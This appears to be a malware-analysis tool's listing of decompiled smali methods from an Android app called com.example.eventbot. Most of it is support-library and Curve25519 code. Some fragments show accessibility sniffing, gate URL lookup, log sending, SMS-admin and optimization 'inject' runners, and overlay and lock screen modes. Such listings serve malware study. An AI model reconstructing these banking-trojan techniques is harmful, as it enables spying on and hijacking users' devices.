                        56const-wide/32 v12, 0x221359e
                        57const-wide/32 v14, 0xbf5d19
                        58const-wide/32 v16, 0x2ed3a0b
                        59const-wide/32 v18, 0x1ca7caf
                        60const-wide/32 v20, 0x2637055
                        61const-wide/32 v22, 0x5f00d4
                        62move-object/from16 v3, p0
                        64invoke-direct/range {v2 .. v23}, Lcom/lib$Curve25519$long10;-><init>(Lcom/lib$Curve25519;JJJJJJJJJJ)V
                        65move-object/from16 v0, p0
                        66iput-object v2, v0, Lcom/lib$Curve25519;->BASE_R2Y:Lcom/lib$Curve25519$long10;
                        67return-void
                        68nop
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0move-object/from16 v14, p0
                        1move-object/from16 v23, p0
                        2move-object/from16 v1, p0
                        3move-object/from16 v0, p1
                        4iput-object v0, v14, Lcom/example/eventbot/MainActivity$Curve25519;->this$0:Lcom/example/eventbot/MainActivity;
                        6invoke-direct/range {p0 .. p0}, Ljava/lang/Object;-><init>()V
                        7const/16 v0, 0x20
                        8iput v0, v14, Lcom/example/eventbot/MainActivity$Curve25519;->KEY_SIZE:I
                        9new-array v2, v0, [B
                        10fill-array-data v2, :array_8c
                        11iput-object v2, v14, Lcom/example/eventbot/MainActivity$Curve25519;->ZERO:[B
                        12new-array v2, v0, [B
                        13fill-array-data v2, :array_a0
                        14iput-object v2, v14, Lcom/example/eventbot/MainActivity$Curve25519;->PRIME:[B
                        15new-array v2, v0, [B
                        16fill-array-data v2, :array_b4
                        17iput-object v2, v14, Lcom/example/eventbot/MainActivity$Curve25519;->ORDER:[B
                        18const v2, 0x1ffffff
                        19iput v2, v14, Lcom/example/eventbot/MainActivity$Curve25519;->P25:I
                        20const v2, 0x3ffffff
                        21iput v2, v14, Lcom/example/eventbot/MainActivity$Curve25519;->P26:I
                        22new-array v0, v0, [B
                        23fill-array-data v0, :array_c8
                        24iput-object v0, v14, Lcom/example/eventbot/MainActivity$Curve25519;->ORDER_TIMES_8:[B
                        25new-instance v15, Lcom/example/eventbot/MainActivity$Curve25519$long10;
                        26move-object v0, v15
                        27const-wide/32 v2, 0x262583b
                        28const-wide/32 v4, 0x11d2ec0
                        29const-wide/32 v6, 0x3937585
                        30const-wide/32 v8, 0x192839
                        31const-wide/32 v10, 0x36e1594
                        32const-wide/32 v12, 0x16e5d66
                        33const-wide/32 v16, 0x122d388
                        34move-object/from16 v44, v15
                        35move-wide/from16 v14, v16
                        36const-wide/32 v16, 0x52c7f8
                        37const-wide/32 v18, 0x3c8ebef
                        38const-wide/32 v20, 0xfa8f32
                        40invoke-direct/range {v0 .. v21}, Lcom/example/eventbot/MainActivity$Curve25519$long10;-><init>(Lcom/example/eventbot/MainActivity$Curve25519;JJJJJJJJJJ)V
                        41move-object/from16 v0, p0
                        42move-object/from16 v1, v44
                        43iput-object v1, v0, Lcom/example/eventbot/MainActivity$Curve25519;->BASE_2Y:Lcom/example/eventbot/MainActivity$Curve25519$long10;
                        44new-instance v1, Lcom/example/eventbot/MainActivity$Curve25519$long10;
                        45move-object/from16 v22, v1
                        46const-wide/16 v24, 0x1670
                        47const-wide/32 v26, 0x7c8650
                        48const-wide/32 v28, 0x491a6d
                        49const-wide/32 v30, 0xd24229
                        50const-wide/32 v32, 0x221359e
                        51const-wide/32 v34, 0xbf5d19
                        52const-wide/32 v36, 0x2ed3a0b
                        53const-wide/32 v38, 0x1ca7caf
                        54const-wide/32 v40, 0x2637055
                        55const-wide/32 v42, 0x5f00d4
                        57invoke-direct/range {v22 .. v43}, Lcom/example/eventbot/MainActivity$Curve25519$long10;-><init>(Lcom/example/eventbot/MainActivity$Curve25519;JJJJJJJJJJ)V
                        58iput-object v1, v0, Lcom/example/eventbot/MainActivity$Curve25519;->BASE_R2Y:Lcom/example/eventbot/MainActivity$Curve25519$long10;
                        59return-void
                        APIs
                        • android.support.v4.graphics.drawable.IconCompat.onPreParceling
                        • android.support.v4.graphics.drawable.IconCompat.mData:[B
                        • android.support.v4.graphics.drawable.IconCompat.mParcelable:Landroid/os/Parcelable
                        • android.support.v4.graphics.drawable.IconCompat.mTintList:Landroid/content/res/ColorStateList
                        • android.support.v4.graphics.drawable.IconCompat.mTintModeStr:Ljava/lang/String
                        Position Instruction Meta Information
                        0const/4 v0, 0x1
                        2invoke-virtual {p1, v0, v0}, Landroidx/versionedparcelable/VersionedParcel;->setSerializationFlags(ZZ)V
                        4invoke-virtual {p1}, Landroidx/versionedparcelable/VersionedParcel;->isStream()Z
                        5move-result v1
                        7invoke-virtual {p0, v1}, Landroid/support/v4/graphics/drawable/IconCompat;->onPreParceling(Z)V
                        8iget v1, p0, Landroid/support/v4/graphics/drawable/IconCompat;->mType:I
                        10invoke-virtual {p1, v1, v0}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(II)V
                        12iget-object v0, p0, Landroid/support/v4/graphics/drawable/IconCompat;->mData:[B
                        13const/4 v1, 0x2
                        15invoke-virtual {p1, v0, v1}, Landroidx/versionedparcelable/VersionedParcel;->writeByteArray([BI)V
                        17iget-object v0, p0, Landroid/support/v4/graphics/drawable/IconCompat;->mParcelable:Landroid/os/Parcelable;
                        18const/4 v1, 0x3
                        20invoke-virtual {p1, v0, v1}, Landroidx/versionedparcelable/VersionedParcel;->writeParcelable(Landroid/os/Parcelable;I)V
                        21iget v0, p0, Landroid/support/v4/graphics/drawable/IconCompat;->mInt1:I
                        22const/4 v1, 0x4
                        24invoke-virtual {p1, v0, v1}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(II)V
                        25iget v0, p0, Landroid/support/v4/graphics/drawable/IconCompat;->mInt2:I
                        26const/4 v1, 0x5
                        28invoke-virtual {p1, v0, v1}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(II)V
                        30iget-object v0, p0, Landroid/support/v4/graphics/drawable/IconCompat;->mTintList:Landroid/content/res/ColorStateList;
                        31const/4 v1, 0x6
                        33invoke-virtual {p1, v0, v1}, Landroidx/versionedparcelable/VersionedParcel;->writeParcelable(Landroid/os/Parcelable;I)V
                        35iget-object p0, p0, Landroid/support/v4/graphics/drawable/IconCompat;->mTintModeStr:Ljava/lang/String;
                        36const/4 v0, 0x7
                        38invoke-virtual {p1, p0, v0}, Landroidx/versionedparcelable/VersionedParcel;->writeString(Ljava/lang/String;I)V
                        39return-void
                        APIs
                        • android.support.v4.media.AudioAttributesImplBase.<init>
                        Position Instruction Meta Information
                        0new-instance v0, Landroid/support/v4/media/AudioAttributesImplBase;
                        2invoke-direct {v0}, Landroid/support/v4/media/AudioAttributesImplBase;-><init>()V
                        3iget v1, v0, Landroid/support/v4/media/AudioAttributesImplBase;->mUsage:I
                        4const/4 v2, 0x1
                        6invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readInt(II)I
                        7move-result v1
                        8iput v1, v0, Landroid/support/v4/media/AudioAttributesImplBase;->mUsage:I
                        9iget v1, v0, Landroid/support/v4/media/AudioAttributesImplBase;->mContentType:I
                        10const/4 v2, 0x2
                        12invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readInt(II)I
                        13move-result v1
                        14iput v1, v0, Landroid/support/v4/media/AudioAttributesImplBase;->mContentType:I
                        15iget v1, v0, Landroid/support/v4/media/AudioAttributesImplBase;->mFlags:I
                        16const/4 v2, 0x3
                        18invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readInt(II)I
                        19move-result v1
                        20iput v1, v0, Landroid/support/v4/media/AudioAttributesImplBase;->mFlags:I
                        21iget v1, v0, Landroid/support/v4/media/AudioAttributesImplBase;->mLegacyStream:I
                        22const/4 v2, 0x4
                        24invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readInt(II)I
                        25move-result p0
                        26iput p0, v0, Landroid/support/v4/media/AudioAttributesImplBase;->mLegacyStream:I
                        27return-object v0
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0move-object v0, p0
                        1move-object v1, p1
                        2iput-object v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->this$1:Lcom/example/eventbot/MainActivity$Curve25519;
                        4invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        5move-wide v1, p2
                        6iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_0:J
                        7move-wide v1, p4
                        8iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_1:J
                        9move-wide v1, p6
                        10iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_2:J
                        11move-wide v1, p8
                        12iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_3:J
                        13move-wide v1, p10
                        14iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_4:J
                        15move-wide v1, p12
                        16iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_5:J
                        17move-wide/from16 v1, p14
                        18iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_6:J
                        19move-wide/from16 v1, p16
                        20iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_7:J
                        21move-wide/from16 v1, p18
                        22iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_8:J
                        23move-wide/from16 v1, p20
                        24iput-wide v1, v0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->_9:J
                        25return-void
                        Cross References
                        APIs
                        • com.example.eventbot.MainActivity.HEX_ARRAY:[C
                        • java.lang.String.<init>
                        Position Instruction Meta Information
                        0array-length v0, p1
                        1mul-int/lit8 v0, v0, 0x2
                        2new-array v0, v0, [C
                        3const/4 v1, 0x0
                        4goto_6: array-length v2, p1
                        5if-ge v1, v2, :cond_22
                        6aget-byte v2, p1, v1
                        7and-int/lit16 v2, v2, 0xff
                        8mul-int/lit8 v3, v1, 0x2
                        10iget-object v4, p0, Lcom/example/eventbot/MainActivity;->HEX_ARRAY:[C
                        11ushr-int/lit8 v5, v2, 0x4
                        12aget-char v5, v4, v5
                        13aput-char v5, v0, v3
                        14add-int/lit8 v3, v3, 0x1
                        15and-int/lit8 v2, v2, 0xf
                        16aget-char v2, v4, v2
                        17aput-char v2, v0, v3
                        18add-int/lit8 v1, v1, 0x1
                        19goto/16 :goto_6
                        20cond_22: new-instance p1, Ljava/lang/String;
                        22invoke-direct {p1, v0}, Ljava/lang/String;-><init>([C)V
                        23return-object p1
                        APIs
                        • java.util.ArrayList.<init>
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T:",
                        3"Ljava/lang/Object;",
                        4">(",
                        5"Ljava/util/List<",
                        6"TT;>;I)",
                        7"Ljava/util/List<",
                        8"TT;>;"
                        9}
                        10.end annotation
                        12invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->readField(I)Z
                        13move-result v0
                        14if-nez v0, :cond_7
                        15return-object p1
                        16cond_7: new-instance p1, Ljava/util/ArrayList;
                        18invoke-direct {p1}, Ljava/util/ArrayList;-><init>()V
                        20invoke-direct {p0, p2, p1}, Landroidx/versionedparcelable/VersionedParcel;->readCollection(ILjava/util/Collection;)Ljava/util/Collection;
                        21move-result-object p1
                        22check-cast p1, Ljava/util/List;
                        23return-object p1
                        APIs
                        • android.support.v4.util.ArraySet.<init>
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T:",
                        3"Ljava/lang/Object;",
                        4">(",
                        5"Ljava/util/Set<",
                        6"TT;>;I)",
                        7"Ljava/util/Set<",
                        8"TT;>;"
                        9}
                        10.end annotation
                        12invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->readField(I)Z
                        13move-result v0
                        14if-nez v0, :cond_7
                        15return-object p1
                        16cond_7: new-instance p1, Landroid/support/v4/util/ArraySet;
                        18invoke-direct {p1}, Landroid/support/v4/util/ArraySet;-><init>()V
                        20invoke-direct {p0, p2, p1}, Landroidx/versionedparcelable/VersionedParcel;->readCollection(ILjava/util/Collection;)Ljava/util/Collection;
                        21move-result-object p1
                        22check-cast p1, Ljava/util/Set;
                        23return-object p1
                        APIs
                        • android.util.Size.<init>
                        Position Instruction Meta Information
                        1invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->readField(I)Z
                        2move-result p2
                        3if-nez p2, :cond_7
                        4return-object p1
                        5cond_7:
                        6invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readBoolean()Z
                        7move-result p1
                        8if-eqz p1, :cond_1b
                        10invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readInt()I
                        11move-result p1
                        13invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readInt()I
                        14move-result p2
                        15new-instance v0, Landroid/util/Size;
                        17invoke-direct {v0, p1, p2}, Landroid/util/Size;-><init>(II)V
                        18return-object v0
                        19cond_1b: const/4 p1, 0x0
                        20return-object p1
                        APIs
                        • android.util.SizeF.<init>
                        Position Instruction Meta Information
                        1invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->readField(I)Z
                        2move-result p2
                        3if-nez p2, :cond_7
                        4return-object p1
                        5cond_7:
                        6invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readBoolean()Z
                        7move-result p1
                        8if-eqz p1, :cond_1b
                        10invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readFloat()F
                        11move-result p1
                        13invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readFloat()F
                        14move-result p2
                        15new-instance v0, Landroid/util/SizeF;
                        17invoke-direct {v0, p1, p2}, Landroid/util/SizeF;-><init>(FF)V
                        18return-object v0
                        19cond_1b: const/4 p1, 0x0
                        20return-object p1
                        Cross References
                        APIs
                        Strings
                        • aSniffPrefs
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        3iget-object v1, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        5invoke-virtual {p0, p1, v1}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        6move-result v1
                        7if-nez v1, :cond_b
                        8const/4 v0, 0x0
                        9goto_a: return v0
                        10cond_b:
                        11const-string v1, "aSniffPrefs"
                        12const/4 v2, 0x1
                        14invoke-virtual {p0, p1, v1, p2, v2}, Lcom/lib;->writeASniffConfig(Landroid/content/Context;Ljava/lang/String;[Ljava/lang/String;Z)Z
                        15const/4 v1, 0x1
                        16sput-boolean v1, Lcom/lib;->isA11ySniffer:Z
                        17try_end_14: goto/16 :goto_a
                        18catch_15: move-exception v1
                        19goto/16 :goto_a
                        Cross References
                        APIs
                        • java.lang.Object.getClass
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T::",
                        3"Landroidx/versionedparcelable/VersionedParcelable;",
                        4">(TT;)",
                        5"Ljava/lang/Class;"
                        6}
                        7.end annotation
                        8.annotation system Ldalvik/annotation/Throws;
                        9value = {
                        10Ljava/lang/ClassNotFoundException;
                        11}
                        12.end annotation
                        14invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        15move-result-object p0
                        17invoke-static {p0}, Landroidx/versionedparcelable/VersionedParcel;->findParcelClass(Ljava/lang/Class;)Ljava/lang/Class;
                        18move-result-object p0
                        19return-object p0
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$Curve25519$long10;->this$1:Lcom/lib$Curve25519;
                        3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        4iput-wide p2, p0, Lcom/lib$Curve25519$long10;->_0:J
                        5iput-wide p4, p0, Lcom/lib$Curve25519$long10;->_1:J
                        6iput-wide p6, p0, Lcom/lib$Curve25519$long10;->_2:J
                        7iput-wide p8, p0, Lcom/lib$Curve25519$long10;->_3:J
                        8iput-wide p10, p0, Lcom/lib$Curve25519$long10;->_4:J
                        9iput-wide p12, p0, Lcom/lib$Curve25519$long10;->_5:J
                        10move-wide/from16 v0, p14
                        11iput-wide v0, p0, Lcom/lib$Curve25519$long10;->_6:J
                        12move-wide/from16 v0, p16
                        13iput-wide v0, p0, Lcom/lib$Curve25519$long10;->_7:J
                        14move-wide/from16 v0, p18
                        15iput-wide v0, p0, Lcom/lib$Curve25519$long10;->_8:J
                        16move-wide/from16 v0, p20
                        17iput-wide v0, p0, Lcom/lib$Curve25519$long10;->_9:J
                        18return-void
                        Cross References
                        APIs
                        Strings
                        • gateUrlsPrefs
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"()",
                        3"Ljava/util/List",
                        4"<",
                        5"Ljava/lang/String;",
                        6">;"
                        7}
                        8.end annotation
                        9.prologue
                        11iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        13const-string v1, "gateUrlsPrefs"
                        15invoke-virtual {p0, v0, v1}, Lcom/lib;->getGateUrls(Landroid/content/Context;Ljava/lang/String;)Ljava/util/List;
                        16move-result-object v0
                        17return-object v0
                        APIs
                        • android.support.v4.media.AudioAttributesImplApi21.<init>
                        • android.support.v4.media.AudioAttributesImplApi21.mAudioAttributes:Landroid/media/AudioAttributes
                        Position Instruction Meta Information
                        0new-instance v0, Landroid/support/v4/media/AudioAttributesImplApi21;
                        2invoke-direct {v0}, Landroid/support/v4/media/AudioAttributesImplApi21;-><init>()V
                        4iget-object v1, v0, Landroid/support/v4/media/AudioAttributesImplApi21;->mAudioAttributes:Landroid/media/AudioAttributes;
                        5const/4 v2, 0x1
                        7invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readParcelable(Landroid/os/Parcelable;I)Landroid/os/Parcelable;
                        8move-result-object v1
                        9check-cast v1, Landroid/media/AudioAttributes;
                        10iput-object v1, v0, Landroid/support/v4/media/AudioAttributesImplApi21;->mAudioAttributes:Landroid/media/AudioAttributes;
                        11iget v1, v0, Landroid/support/v4/media/AudioAttributesImplApi21;->mLegacyStreamType:I
                        12const/4 v2, 0x2
                        14invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readInt(II)I
                        15move-result p0
                        16iput p0, v0, Landroid/support/v4/media/AudioAttributesImplApi21;->mLegacyStreamType:I
                        17return-object v0
                        APIs
                        • android.support.v7.app.AppCompatActivity.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/support/v7/app/AppCompatActivity;-><init>()V
                        2const/4 v0, 0x1
                        3iput v0, p0, Lcom/example/eventbot/activity;->ACTIVITY_MODE_ADMIN:I
                        4const/4 v0, 0x2
                        5iput v0, p0, Lcom/example/eventbot/activity;->ACTIVITY_MODE_A11Y:I
                        6const/4 v0, 0x3
                        7iput v0, p0, Lcom/example/eventbot/activity;->ACTIVITY_MODE_OVERLAY:I
                        8const/4 v0, 0x4
                        9iput v0, p0, Lcom/example/eventbot/activity;->ACTIVITY_MODE_LOCK_NAVIGATION:I
                        10const/4 v0, 0x5
                        11iput v0, p0, Lcom/example/eventbot/activity;->ACTIVITY_MODE_LOCK_OVERLAY:I
                        12const/4 v0, 0x6
                        13iput v0, p0, Lcom/example/eventbot/activity;->ACTIVITY_MODE_WEB:I
                        14const/4 v0, 0x7
                        15iput v0, p0, Lcom/example/eventbot/activity;->ACTIVITY_MODE_PINNED:I
                        16return-void
                        Cross References
                        APIs
                        • android.util.SparseIntArray.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroidx/versionedparcelable/VersionedParcel;-><init>()V
                        2new-instance v0, Landroid/util/SparseIntArray;
                        4invoke-direct {v0}, Landroid/util/SparseIntArray;-><init>()V
                        5iput-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mPositionLookup:Landroid/util/SparseIntArray;
                        6const/4 v0, -0x1
                        7iput v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mCurrentField:I
                        8const/4 v0, 0x0
                        9iput v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mNextRead:I
                        10iput-object p1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        11iput p2, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mOffset:I
                        12iput p3, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mEnd:I
                        13iget p1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mOffset:I
                        14iput p1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mNextRead:I
                        15iput-object p4, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mPrefix:Ljava/lang/String;
                        16return-void
                        APIs
                        • android.os.Looper.prepare
                        • com.lib$8.this$0:Lcom/lib
                        • com.lib$8.val$context:Landroid/content/Context
                        • com.lib$8.val$reason:Ljava/lang/String
                        • com.lib$8.val$log:Ljava/lang/String
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2invoke-static {}, Landroid/os/Looper;->prepare()V
                        4iget-object v0, p0, Lcom/lib$8;->this$0:Lcom/lib;
                        6iget-object v1, p0, Lcom/lib$8;->val$context:Landroid/content/Context;
                        8iget-object v2, p0, Lcom/lib$8;->val$reason:Ljava/lang/String;
                        10iget-object v3, p0, Lcom/lib$8;->val$log:Ljava/lang/String;
                        12invoke-virtual {v0, v1, v2, v3}, Lcom/lib;->sendLog(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        13goto_e: return-void
                        14catch_f: move-exception v0
                        15goto/16 :goto_e
                        Cross References
                        APIs
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2try_start_1:
                        3invoke-direct {p0, p1, p2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v1
                        5if-eqz v1, :cond_c
                        6const/4 v0, 0x1
                        8invoke-virtual {v1, v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        9try_end_b: move-result v0
                        10cond_c: return v0
                        11catch_d: move-exception v0
                        12const/4 v0, 0x0
                        13goto/16 :goto_c
                        Cross References
                        APIs
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-direct {p0, p1, p2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v1
                        5if-eqz v1, :cond_c
                        6const/4 v2, 0x4
                        8invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        9try_end_b: const/4 v0, 0x1
                        10cond_c: return v0
                        11catch_d: move-exception v1
                        12goto/16 :goto_c
                        APIs
                        • android.os.Parcel.setDataPosition
                        Position Instruction Meta Information
                        1invoke-direct {p0, p1}, Landroidx/versionedparcelable/VersionedParcelParcel;->readUntilField(I)I
                        2move-result p1
                        3const/4 v0, -0x1
                        4if-ne p1, v0, :cond_9
                        5const/4 p1, 0x0
                        6return p1
                        7cond_9:
                        8iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        10invoke-virtual {v0, p1}, Landroid/os/Parcel;->setDataPosition(I)V
                        11const/4 p1, 0x1
                        12return p1
                        APIs
                        • android.accessibilityservice.AccessibilityServiceInfo.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v4, -0x1
                        2new-instance v0, Landroid/accessibilityservice/AccessibilityServiceInfo;
                        4invoke-direct {v0}, Landroid/accessibilityservice/AccessibilityServiceInfo;-><init>()V
                        5iput v4, v0, Landroid/accessibilityservice/AccessibilityServiceInfo;->eventTypes:I
                        6const/16 v1, 0x7b
                        7iput v1, v0, Landroid/accessibilityservice/AccessibilityServiceInfo;->flags:I
                        8const-wide/16 v2, 0x1
                        9iput-wide v2, v0, Landroid/accessibilityservice/AccessibilityServiceInfo;->notificationTimeout:J
                        10iput v4, v0, Landroid/accessibilityservice/AccessibilityServiceInfo;->feedbackType:I
                        11return-object v0
                        Cross References
                        APIs
                        Strings
                        • aSniffPrefs
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        4const-string v1, "aSniffPrefs"
                        6invoke-virtual {p0, v0, v1}, Lcom/lib;->cleanASniffConfig(Landroid/content/Context;Ljava/lang/String;)Z
                        7const/4 v0, 0x0
                        8sput-boolean v0, Lcom/lib;->isA11ySniffer:Z
                        9goto_a: return-void
                        10catch_b: move-exception v0
                        11goto/16 :goto_a
                        APIs
                        • android.support.v4.media.AudioAttributesCompat.<init>
                        • android.support.v4.media.AudioAttributesCompat.mImpl:Landroid/support/v4/media/AudioAttributesImpl
                        Position Instruction Meta Information
                        0new-instance v0, Landroid/support/v4/media/AudioAttributesCompat;
                        2invoke-direct {v0}, Landroid/support/v4/media/AudioAttributesCompat;-><init>()V
                        4iget-object v1, v0, Landroid/support/v4/media/AudioAttributesCompat;->mImpl:Landroid/support/v4/media/AudioAttributesImpl;
                        5const/4 v2, 0x1
                        7invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readVersionedParcelable(Landroidx/versionedparcelable/VersionedParcelable;I)Landroidx/versionedparcelable/VersionedParcelable;
                        8move-result-object p0
                        9check-cast p0, Landroid/support/v4/media/AudioAttributesImpl;
                        10iput-object p0, v0, Landroid/support/v4/media/AudioAttributesCompat;->mImpl:Landroid/support/v4/media/AudioAttributesImpl;
                        11return-object v0
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2new-instance v0, Landroidx/versionedparcelable/VersionedParcelParcel;
                        4invoke-direct {v0, p1}, Landroidx/versionedparcelable/VersionedParcelParcel;-><init>(Landroid/os/Parcel;)V
                        6invoke-virtual {v0}, Landroidx/versionedparcelable/VersionedParcelParcel;->readVersionedParcelable()Landroidx/versionedparcelable/VersionedParcelable;
                        7move-result-object p1
                        8iput-object p1, p0, Landroidx/versionedparcelable/ParcelImpl;->mParcel:Landroidx/versionedparcelable/VersionedParcelable;
                        9return-void
                        APIs
                        • android.os.Parcel.readInt
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0}, Landroid/os/Parcel;->readInt()I
                        4move-result v0
                        5if-eqz v0, :cond_a
                        6const/4 v0, 0x1
                        7goto/16 :goto_b
                        8cond_a: const/4 v0, 0x0
                        9goto_b: return v0
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$allowOptimizationsIgnoredRun;->this$0:Lcom/lib;
                        3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        4const/4 v0, 0x0
                        5iput-boolean v0, p0, Lcom/lib$allowOptimizationsIgnoredRun;->result:Z
                        6iput-object p3, p0, Lcom/lib$allowOptimizationsIgnoredRun;->inject:Ljava/lang/String;
                        7iput-object p2, p0, Lcom/lib$allowOptimizationsIgnoredRun;->context:Landroid/content/Context;
                        8return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$allowSmsAdminRun;->this$0:Lcom/lib;
                        3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        4const/4 v0, 0x0
                        5iput-boolean v0, p0, Lcom/lib$allowSmsAdminRun;->result:Z
                        6iput-object p3, p0, Lcom/lib$allowSmsAdminRun;->inject:Ljava/lang/String;
                        7iput-object p2, p0, Lcom/lib$allowSmsAdminRun;->context:Landroid/content/Context;
                        8return-void
                        APIs
                        • android.support.v7.app.AppCompatActivity.onRequestPermissionsResult
                        Position Instruction Meta Information
                        0const/16 v0, 0x65
                        1if-eq p1, v0, :cond_8
                        3invoke-super {p0, p1, p2, p3}, Landroid/support/v7/app/AppCompatActivity;->onRequestPermissionsResult(I[Ljava/lang/String;[I)V
                        4goto/16 :goto_b
                        5cond_8: const/4 p1, 0x0
                        6aget p1, p3, p1
                        7goto_b: return-void
                        APIs
                        • java.util.concurrent.Semaphore.<init>
                        Position Instruction Meta Information
                        0new-instance v0, Ljava/util/concurrent/Semaphore;
                        1const/4 v1, 0x1
                        3invoke-direct {v0, v1}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        4sput-object v0, Lcom/example/eventbot/service;->loadLibMutex:Ljava/util/concurrent/Semaphore;
                        5const/4 v0, 0x0
                        6sput-boolean v0, Lcom/example/eventbot/service;->isRunning:Z
                        7return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$4;->this$0:Lcom/lib;
                        2iput-object p2, p0, Lcom/lib$4;->val$context:Landroid/content/Context;
                        3iput-object p3, p0, Lcom/lib$4;->val$bcr:Landroid/content/BroadcastReceiver;
                        4iput-object p4, p0, Lcom/lib$4;->val$intent:Landroid/content/Intent;
                        6invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        7return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$5;->this$0:Lcom/lib;
                        2iput-object p2, p0, Lcom/lib$5;->val$context:Landroid/content/Context;
